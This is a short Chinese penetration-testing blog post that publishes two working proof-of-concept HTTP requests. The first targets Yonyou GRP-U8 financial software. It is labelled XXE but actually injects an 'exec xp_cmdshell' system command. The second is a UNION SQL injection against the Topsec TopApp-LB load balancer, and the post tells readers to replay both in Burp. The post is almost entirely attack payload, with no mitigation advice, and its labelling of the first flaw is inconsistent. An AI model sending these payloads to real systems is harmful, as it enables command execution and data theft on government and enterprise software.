用友GRP-u8 注入+天融信TopApp-LB 负载均衡系统sql注入
时间:2020-9-11 21:11 作者:admin 分类: 渗透测试
用友GRP-U8R10行政事业财务管理软件是用友公司专注于国家电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域最专业的政府财务管理软件。
该系统被曝存在命令执行漏洞,当用户可以控制命令执行函数中的参数时,将可注入恶意系统命令到正常命令中,造成命令执行攻击,漏洞细节以及相关漏洞poc如下:
用友GRP-u8 XXE漏洞(XML External Entity-XML外部实体注入):
POST /Proxy HTTP/1.1 Accept: Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;) Host: host Content-Length: 357 Connection: Keep-Alive Cache-Control: no-cache cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'net user'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
burp里面repeat即可:
天融信TopApp-LB 负载均衡系统sql注入:
POST /acc/clsf/report/datasource.php HTTP/1.1 Host: Connection: close Accept: text/javascript, text/html, application/xml, text/xml, */* X-Prototype-Version: 1.6.0.3 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=ijqtopbcbmu8d70o5t3kmvgt57 Content-Type: application/x-www-form-urlencoded Content-Length: 201 t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22--+&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=@
至于前面的sangfor EDR RCE漏洞已经发过了。
扫描二维码,在手机上阅读